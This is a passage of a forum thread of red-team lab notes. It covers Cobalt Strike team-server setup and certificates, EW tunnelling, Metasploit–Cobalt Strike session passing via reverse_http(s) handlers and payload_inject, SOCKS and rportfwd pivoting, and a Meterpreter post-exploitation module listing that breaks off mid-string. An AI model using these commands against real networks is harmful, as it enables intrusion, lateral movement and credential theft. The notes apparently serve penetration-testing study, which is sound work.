  6. -keyalg RSA # 指定密钥的算法 (如 RSA  DSA(如果不指定默认采用DSA))
  7. -alias cobaltstrike # 产生别名
  8. -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth" # 指定证书拥有者信息
复制代码



5)启动指令:
  1. # start the team server.
  2. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
复制代码


该指令参考:
JVM调优总结 -Xms -Xmx -Xmn -Xss - 李克华 - 博客园 (cnblogs.com)
虚拟机配置参数 - 走看看 (zoukankan.com)
  1. # 指令一一拆解:
  2. java
  3. # 配置并行收集器的线程数,即:同时多少个线程一起进行垃圾回收。此值最好配置与处理器数目相等。
  4. -XX:ParallelGCThreads=4

  5. # cobaltstrike自带的参数
  6. -Dcobaltstrike.server_port=50050
  7. -Djavax.net.ssl.keyStore=./cobaltstrike.store
  8. -Djavax.net.ssl.keyStorePassword=123456

  9. # 选择Hotspot Server JVM,64位jdk只支持server VM.这个参数是隐含的,即默认设置
  10. -server
  11. # 启用java堆优化,基于RAM和CPU的配置通过设置各种参数使其跟适合带有密集分配内存的长时间任务的分配,默认关闭的
  12. -XX:+AggressiveHeap
  13. # 配置年老代垃圾收集方式为并行收集。JDK6.0支持对年老代并行收集。
  14. -XX:+UseParallelGC

  15. # 指定server.TeamServer函数加载的文件路径,即当面目录下的cobaltstrike.jar文件,完成CS服务端的启动
  16. -classpath ./cobaltstrike.jar server.TeamServer $*
复制代码



(2)客户端启动文件:start
  1. java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike.jar
复制代码


拆解分析:参考链接:
JVM调优总结 -Xms -Xmx -Xmn -Xss - 李克华 - 博客园 (cnblogs.com)
Java命令行参数详解_御风而行-CSDN博客_java命令行参数
  1. java
  2. # 配置并行收集器的线程数,即:同时多少个线程一起进行垃圾回收。此值最好配置与处理器数目相等。
  3. -XX:ParallelGCThreads=4
  4. # 启用java堆优化,基于RAM和CPU的配置通过设置各种参数使其跟适合带有密集分配内存的长时间任务的分配,默认关闭的
  5. -XX:+AggressiveHeap
  6. # 配置年老代垃圾收集方式为并行收集。JDK6.0支持对年老代并行收集。
  7. -XX:+UseParallelGC
  8. #设置JVM促使内存为512Mm。此值可以设置与-Xmx相同,以避免每次垃圾回收完成后JVM重新分配内存。
  9. -Xms512M
  10. # 设置JVM最大可用内存为1024M。
  11. -Xmx1024M
  12. # 启动该文件
  13. -jar cobaltstrike.jar
复制代码


原版的teamserver文件如下所示:
  1. #!/bin/bash
  2. #
  3. # Start Cobalt Strike Team Server
  4. #

  5. # make pretty looking messages (thanks Carlos)
  6. function print_good () {
  7.     echo -e "\x1B[01;32m[+]\x1B[0m $1"
  8. }

  9. function print_error () {
  10.     echo -e "\x1B[01;31m[-]\x1B[0m $1"
  11. }

  12. function print_info () {
  13.     echo -e "\x1B[01;34m[*]\x1B[0m $1"
  14. }

  15. # check that we're r00t,检查执行用户是否是root权限
  16. if [ $UID -ne 0 ]; then
  17.     print_error "Superuser privileges are required to run the team server"
  18.     exit
  19. fi

  20. # check if java is available...
  21. if [ $(command -v java) ]; then
  22.     true
  23. else
  24.     print_error "java is not in \$PATH"
  25.     echo "    is Java installed?"
  26.     exit
  27. fi

  28. # check if keytool is available...
  29. if [ $(command -v keytool) ]; then
  30.     true
  31. else
  32.     print_error "keytool is not in \$PATH"
  33.     echo "    install the Java Developer Kit"
  34.     exit
  35. fi

  36. # generate a certificate
  37.     # naturally you're welcome to replace this step with your own permanent certificate.
  38.     # just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
  39.     # -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
  40.     # an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
  41.     # is printed so users may have a chance to verify they're not being owned.
  42. if [ -e ./cobaltstrike.store ]; then
  43.     print_info "Will use existing X509 certificate and keystore (for SSL)"
  44. else
  45.     print_info "Generating X509 certificate and keystore (for SSL)"
  46.     keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
  47. fi

  48. # start the team server.
  49. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
复制代码


3.生成自己的证书文件
3.1.修改密码--生成证书

(1)生成证书(修改密码)
  1. # 原本的
  2. keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"

  3. # 修改后
  4. # 注意:storepass和keypass必须一样
  5. keytool -keystore ./cobaltstrike.store -storepass 666666 -keypass 666666 -genkey -keyalg RSA -alias cobaltstrike -dname  "CN=xor0ne, OU=test, O=cobaltstrike, L=test, S=test, C=test"
复制代码


执行成功:在当前目录下生成cobaltstrike.store文件


(2)服务端启动
首先修稿启动文件:teamserver.bat
  1. # 原本的teamserver文件
  2. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*

  3. # 修改后
  4. # -Dcobaltstrike.server_port=50050 默认端口,可自行修改
  5. #  -Djavax.net.ssl.keyStorePassword=666666
  6.     java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=666666 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer %*
  7. 点击并拖拽以移动
复制代码


服务端启动:
teamserver.bat 192.168.10.21 password

(3)客户端启动
将服务器端生成的cobaltstrike.store文件复制到客户端目录中去,然后执行客户端start.sh。成功。
3.2.直接生成PKCS12证书
  1. 方法一:
  2. 已经生成一个非pkcs12格式的证书,将此证书通过如下命令载入

  3. keytool -importkeystore -srckeystore ./cobaltstrike.store -destkeystore ./cobaltstrike.store -deststoretype pkcs12
  4. 点击并拖拽以移动


  5. 方法二:
  6. 直接生成PKCS12证书

  7. keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=ChaoYang, C=CN" -storetype PKCS12
复制代码




4.附录:出现的问题如下:

问题1:生成.store文件错误
keytool 错误: java.io.IOException: Keystore was tampered with, or password was incorrect

原因:与当前目录的文件冲突
解决办法:删除或者重命名当前目录下的cobaltstrike.store文件。

问题2:服务端启动错误
报错如下:(这只是一种,实际情况有好几种,就不一一列举了。)

原因:
  • 生成cobaltstrike.store文件时,两个密钥没有保持一致。
  • 启动文件的teamserver对应的指令忘记修改了。最后一行的对应keyStorePassword也需要修改。
  1. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=666666 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer %*
复制代码




回复

使用道具 举报

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
 楼主| 发表于 2022-1-6 14:47:42 | 显示全部楼层


【20220106】​








0x01 EW-二层代理昨天用porttunnel尝试不成功,今天偶然用ew尝试成功了。
环境如下:
  1. C:windows10:cobaltstrike服务器端,192.168.0.106
  2. A:win7:双网卡:192.168.159.6 和 192.168.59.128
  3. B:win7-2(内网):192.168.59.130
复制代码


实验如下所示:


A.在C主机的cobaltstrike创建一个监听器1,用来连接的。(建议使用https。我这里一不小心使用了http)





B.上传ew到右侧A主机,运行下列命令:创建隧道。
  1. # ew_for_Win.exe -s lcx_tran -l 监听端口 -f 指定得内网地址 -g 内网某服务端口

  2. # 将主机A的1080请求交给主机C(0.106)的1001端口

  3. ew -s lcx_tran -l 1080 -f 192.168.0.106 -g 1001
复制代码


说明:该命令意思是将本机1080端口收到的代理请求转交给B主机(192.168.0.106)的1001端口。
同时在主机C的cobaltstrike上在创建一个监听器2,用于内网主机B反弹主机A。



C.通过监听器2生成一个可执行文件test01.exe,放在内网机器B上,让其执行。成功上线。

主机A的隧道情况如下所示:





0x02 MSF和cobaltstrike流量派生
1.cobalt strike->msf
(1)reverse_https(失败)
A.msf创建监听(https协议)

  1. msf6 > use exploit/multi/handler
  2. [*] Using configured payload generic/shell_reverse_tcp
  3. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_https
  4. payload => windows/meterpreter/reverse_http
  5. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LHOST 192.168.159.7
  6. LHOST => 192.168.159.7
  7. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LPORT 2000
  8. LPORT => 2000
  9. msf6 exploit(multi/handler) > run -j
复制代码




B.cs新建一个监听器,地址为msf地址,端口为msf的监听端口



然后在CS上对受害机增加会话。

C.msf无法上线。。。



(2)reverse_https(成功)
A.msf创建监听(https协议)
  1. msf6 > use exploit/multi/handler
  2. [*] Using configured payload generic/shell_reverse_tcp
  3. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_https
  4. payload => windows/meterpreter/reverse_https
  5. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LHOST 192.168.159.7
  6. LHOST => 192.168.159.7
  7. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LPORT 3000
  8. LPORT => 3000
  9. msf6 exploit(multi/handler) > run -j
复制代码





B.cs新建一个监听器,地址为msf地址,端口为msf的监听端口

  然后在CS上对受害机增加会话。



C.msf收到CS的派生会话,输入background即可返回msf exploit(multi/handler)。




2.Msf->cobalt strike
如果Metasploit已经获取到了一个会话,可以通过payload_inject模块进行会话派生,将会话传递到Cobaltstrike。
(1)reverse_http(成功)
A.首先在cs中开启监听




B.msf配置,通过msf的payload_inject模块将会话派生到cobalt strike里面。

  1. use exploit/windows/local/payload_inject
  2. <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_http
  3. <span class="hljs-built_in">set</span> DisablePayloadHandler <span class="hljs-literal">true</span>   <span class="hljs-comment">#默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true</span>
  4. <span class="hljs-built_in">set</span> lhost 192.168.10.18               <span class="hljs-comment">#cobaltstrike监听的ip</span>
  5. <span class="hljs-built_in">set</span> lport 4000                 <span class="hljs-comment">#cobaltstrike监听的端口 </span>
  6. <span class="hljs-built_in">set</span> session 1                   <span class="hljs-comment">#这里是获得的session的id</span>
  7. exploit
复制代码




C.cobaltstrike成功上线。



(2)reverse_https(成功)A.首先在cs中开启监听




B.msf配置,通过msf的payload_inject模块将会话派生到cobalt strike里面。

  1. use exploit/windows/local/payload_inject
  2. <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_https
  3. <span class="hljs-built_in">set</span> DisablePayloadHandler <span class="hljs-literal">true</span>   <span class="hljs-comment">#默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true</span>
  4. <span class="hljs-built_in">set</span> lhost 192.168.10.18               <span class="hljs-comment">#cobaltstrike监听的ip</span>
  5. <span class="hljs-built_in">set</span> lport 5000                 <span class="hljs-comment">#cobaltstrike监听的端口 </span>
  6. <span class="hljs-built_in">set</span> session 1                   <span class="hljs-comment">#这里是获得的session的id</span>
  7. exploit
复制代码





C.cobalt strike成功上线。



附录:1.监听器学习


  1. [1]HTTP Hosts
  2. [2]HTTP Host(Stager)
  3. [3]Profile
  4. [4]HTTP Port(C2)
  5. [5]HTTP Port(Bind)
  6. [6]HTTP Host Header
  7. [7]HTTP Proxy
复制代码


(1)端口port(C2)和port(Bind)的区别
  1. [4]port(C2):在cobaltstrike服务器上会默认创建这个端口(仅填一个端口)
  2. [5]Port(Bind):在cobaltstrike服务器上创建Bind端口,而不创建C2端口(如果同时填了的话)
复制代码


我们创建两个cobaltstrike尝试一下。(与地址无关,即可填cobaltstrike的ip也可填其他的ip)
  1. test01:[4]port(C2):1234----[5]Port(Bind):空
  2. test02:[4]port(C2):2234----[5]Port(Bind):3235
复制代码







查看cobaltstrike的端口开放情况:

  1. <span class="hljs-meta"># cobaltstrike的监听器情况如下:</span>
  2. test01:[<span class="hljs-number">4</span>]<span class="hljs-built_in">port</span>(C2):<span class="hljs-number">1234</span>----[<span class="hljs-number">5</span>]<span class="hljs-built_in">Port</span>(Bind):空
  3. test02:[<span class="hljs-number">4</span>]<span class="hljs-built_in">port</span>(C2):<span class="hljs-number">2234</span>----[<span class="hljs-number">5</span>]<span class="hljs-built_in">Port</span>(Bind):<span class="hljs-number">3235</span>
复制代码





那么这两个我们可以怎么去用呢?我们以监听器test02为例。
  1. test02:[4]port(C2):2234----[5]Port(Bind):3235
  2. 假设监听器test02填写的是主机A的ip为192.168.59.128
  3. cobaltstrike主机的ip为:192.168.0.106
复制代码

环境:
  1. C:windows10:cobaltstrike服务器端,192.168.0.106
  2. A:win7:双网卡:192.168.159.6 和 192.168.59.128
  3. B:win7-2(内网):192.168.59.130
复制代码




我们利用test02监听器去生成一个可执行文件,受害机B(内网)执行文件后,首先需要连接的是主机A(内网:192.168.59.128:2234),我们在A上添加一个隧道将来自2234的请求转发到cobaltstrike主机的3235端口即可。成功上线。





2.中转Pivoting中转的话主要分为3个。
  1. [1] SOCKS Server <span class="hljs-comment"># 在cobaltstrike上开一个端口,作为SOCKS服务器端口</span>
  2. [2] Listener
  3. [3] Deploy VPN
复制代码





(1)SOCKS Server
参考链接:Cobalt Strike使用教程一 - 尚码园
通过 [beacon] → Pivoting → SOCKS Server 来在你的团队服务器上设置一个 SOCKS4a 代理服务
器。或者使用 socks 8080 命令来在端口 8080 上设置一个 SOCKS4a 代理服务器(或者任何其他你想选择的端口)。
要查看当前已经配置的 SOCKS 服务器,通过 View → Proxy Pivots 。
使用方法:我们以cobaltstrike作为服务器,然后利用ew连接隧道,这样便可以把内网的及其代理出来了。
环境:
  1. C外网:cobaltstrike服务器:192.168.0.106
  2. B外网:kali20201,metasploit的ip:192.168.0.194(桥接模式)
  3. A内网:可访问外网C,但是C无法访问他(自建环境时可以把VMnet8给禁止)
复制代码


A.首先我们在C主机cobaltstrike上通过 [beacon] → Pivoting → SOCKS Server ,建立一个带代理服务器端口。






B.方法一:代理kali

在B主机上代理C,然后利用nmap进行端口扫描。
首选我们需要在B主机(kali2021)上编辑/etc/proxychains.conf 文件。
  1. vim /etc/proxychains.conf

  2. <span class="hljs-comment"># 添加sock4代理:socks4 cs的ip 代理服务器端口</span>
  3. socks4 192.168.0.106 22222
  4. <span class="hljs-comment"># 注释掉文件中的proxy_dns</span>
复制代码








使用proxychains代理扫描内网主机
  1. proxychains nmap -sP 192.168.59.0/24
复制代码


(以下为网图,我本地失败了。。。)



C.方法二:经过隧道将整个msf带进目标内网
点击View->Proxy Pivots,选择Socks4a Proxy,点击Tunnel
  1. setg Proxies socks4:192.168.0.106:22222
复制代码





打开msf对内网进行扫描。
  1. msf6 > setg Proxies socks4:192.168.0.106:22222
  2. Proxies => socks4:192.168.0.106:22222
  3. msf6 > use auxiliary/scanner/portscan/tcp
  4. msf6 auxiliary(scanner/portscan/tcp) > <span class="hljs-built_in">set</span> rhosts 192.168.59.128
  5. rhosts => 192.168.59.128
  6. msf6 auxiliary(scanner/portscan/tcp) > <span class="hljs-built_in">set</span> ports 80,3306,445
  7. ports => 80,3306,445
  8. msf6 auxiliary(scanner/portscan/tcp) > run

  9. [*] 192.168.59.128:       - Scanned 1 of 1 hosts (100% complete)                                                                                                                                                                             
  10. [*] Auxiliary module execution completed
复制代码


(我本地失败了,原因不明。。)



(2)Listener(rportfwd 命令)使用 rportfwd 命令来通过 Beacon 设置一个反向跳板。 rportfwd 命令会绑定失陷主机上的一个端
口。任何到此端口的连接将会导致你的 Cobalt Strike 服务器初始化一个到另一个主机和端口的连接并
中继这两个连接之间的流量。Cobalt Strike 通过 Beacon 隧道传输流量。 rportfwd 命令的语法是:
  1. rportfwd [<span class="hljs-built_in">bind</span> port] [forward host] [forward port]
复制代码


使用 rportfwd stop [bind port] 停用反向端口转发。
利用web服务器的会话建立pivot监听器: pivot 监听器将绑定到指定会话上的侦听端口。假设我们已经弄到了一台web服务器A的session,发现web服务器后面发现有一台内网机器B,此时我们想要将这台内网机器B的端口通过web服务器转发给我们CS服务器,这时就需要利用到端口转发功能。

A.首先,对CS服务器上获取的web服务器A的session右键,建立一个pivod监听器:




点击建立pivot监听器后,出现的弹框其实只用改NAME,其他已经自动帮我们填充了,这里的host其实就是web服务器的IP。





B.接着利用这个pivot监听器创建一个攻击文件:



选择监听器。



C.执行该文件后回到CS服务器,就能看到已经完成端口转发了。



PS:如果中转机出现了问题,那么所中转的内网也将会有问题。



注意:这个Listener刚刚创建的时候,在中转机是查不到对应端口的,只有当内网主机连接后才会产生对应的端口。(实践所得,个人并不确定真实性质。)




3.Msf-后渗透模块
  1. msf迁移进程 :migrate pid
  2. cs可以注入进程,但不可以迁移进程。
复制代码



查看后渗透载荷:
run 连续敲三下tab键。
  1. <pre class="cke_widget_element" data-cke-widget-data="%7B%22classes%22%3Anull%2C%22lang%22%3A%22bash%22%2C%22code%22%3A%22meterpreter%20%3E%20run%5CnDisplay%20all%20522%20possibilities%3F%20(y%20or%20n)%5Cnrun%20arp_scanner%5Cnrun%20autoroute%5Cnrun%20checkvm%5Cnrun%20credcollect%5Cnrun%20domain_list_gen%5Cnrun%20dumplinks%5Cnrun%20duplicate%5Cnrun%20enum_chrome%5Cnrun%20enum_firefox%5Cnrun%20enum_logged_on_users%5Cnrun%20enum_powershell_env%5Cnrun%20enum_putty%5Cnrun%20enum_shares%5Cnrun%20enum_vmware%5Cnrun%20event_manager%5Cnrun%20exploit%2Fmulti%2Flocal%2Fallwinner_backdoor%5Cnrun%20exploit%2Fmulti%2Flocal%2Fmagnicomp_sysinfo_mcsiwrapper_priv_esc%5Cnrun%20exploit%2Fmulti%2Flocal%2Fxorg_x11_suid_server%5Cnrun%20exploit%2Fmulti%2Flocal%2Fxorg_x11_suid_server_modulepath%5Cnrun%20exploit%2Fwindows%2Flocal%2Fadobe_sandbox_adobecollabsync%5Cnrun%20exploit%2Fwindows%2Flocal%2Fagnitum_outpost_acs%5Cnrun%20exploit%2Fwindows%2Flocal%2Falpc_taskscheduler%5Cnrun%20exploit%2Fwindows%2Flocal%2Falways_install_elevated%5Cnrun%20exploit%2Fwindows%2Flocal%2Fanyconnect_lpe%5Cnrun%20exploit%2Fwindows%2Flocal%2Fapplocker_bypass%5Cnrun%20exploit%2Fwindows%2Flocal%2Fappxsvc_hard_link_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fask%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbits_ntlm_token_impersonation%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbthpan%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_comhijack%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_dotnet_profiler%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_eventvwr%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_fodhelper%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_injection%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_injection_winsxs%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_sdclt%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_silentcleanup%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_sluihijack%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_vbs%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_windows_store_filesys%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_windows_store_reg%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcapcom_sys_exec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcomahawk%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcurrent_user_psexec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2017_8464_lnk_lpe%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2018_8453_win32k_priv_esc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2019_1458_wizardopium%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_0668_service_tracing%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_0787_bits_arbitrary_file_move%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_0796_smbghost%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1048_printerdemon%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1054_drawiconex_lpe%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1313_system_orchestrator%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1337_printerdemon%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_17136%5Cnrun%20exploit%2Fwindows%2Flocal%2Fdnsadmin_serverlevelplugindll%5Cnrun%20exploit%2Fwindows%2Flocal%2Fdocker_credential_wincred%5Cnrun%20exploit%2Fwindows%2Flocal%2Fdruva_insync_insynccphwnet64_rcp_type_5_priv_esc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fgog_galaxyclientservice_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fikeext_service%5Cnrun%20exploit%2Fwindows%2Flocal%2Fipass_launch_app%5Cnrun%20exploit%2Fwindows%2Flocal%2Flenovo_systemupdate%5Cnrun%20exploit%2Fwindows%2Flocal%2Fmov_ss%5Cnrun%20exploit%2Fwindows%2Flocal%2Fmqac_write%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms10_015_kitrap0d%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms10_092_schelevator%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms11_080_afdjoinleaf%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_005_hwnd_broadcast%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_053_schlamperei%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_081_track_popup_menu%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_097_ie_registry_symlink%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms14_009_ie_dfsvc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms14_058_track_popup_menu%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms14_070_tcpip_ioctl%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms15_004_tswbproxy%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms15_051_client_copy_image%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms15_078_atmfd_bof%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_014_wmi_recv_notif%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_016_webdav%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_032_secondary_logon_handle_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_075_reflection%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_075_reflection_juicy%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms18_8120_win32k_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms_ndproxy%5Cnrun%20exploit%2Fwindows%2Flocal%2Fnovell_client_nicm%5Cnrun%20exploit%2Fwindows%2Flocal%2Fnovell_client_nwfs%5Cnrun%20exploit%2Fwindows%2Flocal%2Fntapphelpcachecontrol%5Cnrun%20exploit%2Fwindows%2Flocal%2Fntusermndragover%5Cnrun%20exploit%2Fwindows%2Flocal%2Fnvidia_nvsvc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpanda_psevents%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpayload_inject%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpersistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpersistence_image_exec_options%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpersistence_service%5Cnrun%20exploit%2Fwindows%2Flocal%2Fplantronics_hub_spokesupdateservice_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpowershell_cmd_upgrade%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpowershell_remoting%5Cnrun%20exploit%2Fwindows%2Flocal%2Fppr_flatten_rec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fps_persist%5Cnrun%20exploit%2Fwindows%2Flocal%2Fps_wmi_exec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpxeexploit%5Cnrun%20exploit%2Fwindows%2Flocal%2Frazer_zwopenprocess%5Cnrun%20exploit%2Fwindows%2Flocal%2Fregistry_persistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fricoh_driver_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Frun_as%5Cnrun%20exploit%2Fwindows%2Flocal%2Fs4u_persistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fservice_permissions%5Cnrun%20exploit%2Fwindows%2Flocal%2Funquoted_service_path%5Cnrun%20exploit%2Fwindows%2Flocal%2Fvirtual_box_guest_additions%5Cnrun%20exploit%2Fwindows%2Flocal%2Fvirtual_box_opengl_escape%5Cnrun%20exploit%2Fwindows%2Flocal%2Fvss_persistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwebexec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwindscribe_windscribeservice_priv_esc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwmi%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwmi_persistence%5Cnrun%20file_collector%5Cnrun%20get_application_list%5Cnrun%20get_env%5Cnrun%20get_filezilla_creds%5Cnrun%20get_local_subnets%5Cnrun%20get_pidgin_creds%5Cnrun%20get_valid_community%5Cnrun%20getcountermeasure%5Cnrun%20getgui%5Cnrun%20gettelnet%5Cnrun%20getvncpw%5Cnrun%20hashdump%5Cnrun%20hostsedit%5Cnrun%20keylogrecorder%5Cnrun%20killav%5Cnrun%20metsvc%5Cnrun%20migrate%5Cnrun%20multi_console_command%5Cnrun%20multi_meter_inject%5Cnrun%20multicommand%5Cnrun%20multiscript%5Cnrun%20netenum%5Cnrun%20packetrecorder%5Cnrun%20panda_2007_pavsrv51%5Cnrun%20persistence%5Cnrun%20pml_driver_config%5Cnrun%20post%2Faix%2Fhashdump%5Cnrun%20post%2Fandroid%2Fcapture%2Fscreen%5Cnrun%20post%2Fandroid%2Fgather%2Fhashdump%5Cnrun%20post%2Fandroid%2Fgather%2Fsub_info%5Cnrun%20post%2Fandroid%2Fgather%2Fwireless_ap%5Cnrun%20post%2Fandroid%2Fmanage%2Fremove_lock%5Cnrun%20post%2Fandroid%2Fmanage%2Fremove_lock_root%5Cnrun%20post%2Fapple_ios%2Fgather%2Fios_image_gather%5Cnrun%20post%2Fapple_ios%2Fgather%2Fios_text_gather%5Cnrun%20post%2Fbsd%2Fgather%2Fhashdump%5Cnrun%20post%2Ffirefox%2Fgather%2Fcookies%5Cnrun%20post%2Ffirefox%2Fgather%2Fhistory%5Cnrun%20post%2Ffirefox%2Fgather%2Fpasswords%5Cnrun%20post%2Ffirefox%2Fgather%2Fxss%5Cnrun%20post%2Ffirefox%2Fmanage%2Fwebcam_chat%5Cnrun%20post%2Fhardware%2Fautomotive%2Fcan_flood%5Cnrun%20post%2Fhardware%2Fautomotive%2Fcanprobe%5Cnrun%20post%2Fhardware%2Fautomotive%2Fgetvinfo%5Cnrun%20post%2Fhardware%2Fautomotive%2Fidentifymodules%5Cnrun%20post%2Fhardware%2Fautomotive%2Fmalibu_overheat%5Cnrun%20post%2Fhardware%2Fautomotive%2Fmazda_ic_mover%5Cnrun%20post%2Fhardware%2Fautomotive%2Fpdt%5Cnrun%20post%2Fhardware%2Frftransceiver%2Frfpwnon%5Cnrun%20post%2Fhardware%2Frftransceiver%2Ftransmitter%5Cnrun%20post%2Fhardware%2Fzigbee%2Fzstumbler%5Cnrun%20post%2Flinux%2Fbusybox%2Fenum_connections%5Cnrun%20post%2Flinux%2Fbusybox%2Fenum_hosts%5Cnrun%20post%2Flinux%2Fbusybox%2Fjailbreak%5Cnrun%20post%2Flinux%2Fbusybox%2Fping_net%5Cnrun%20post%2Flinux%2Fbusybox%2Fset_dmz%5Cnrun%20post%2Flinux%2Fbusybox%2Fset_dns%5Cnrun%20post%2Flinux%2Fbusybox%2Fsmb_share_root%5Cnrun%20post%2Flinux%2Fbusybox%2Fwget_exec%5Cnrun%20post%2Flinux%2Fdos%2Fxen_420_dos%5Cnrun%20post%2Flinux%2Fgather%2Fcheckcontainer%5Cnrun%20post%2Flinux%2Fgather%2Fcheckvm%5Cnrun%20post%2Flinux%2Fgather%2Fecryptfs_creds%5Cnrun%20post%2Flinux%2Fgather%2Fenum_commands%5Cnrun%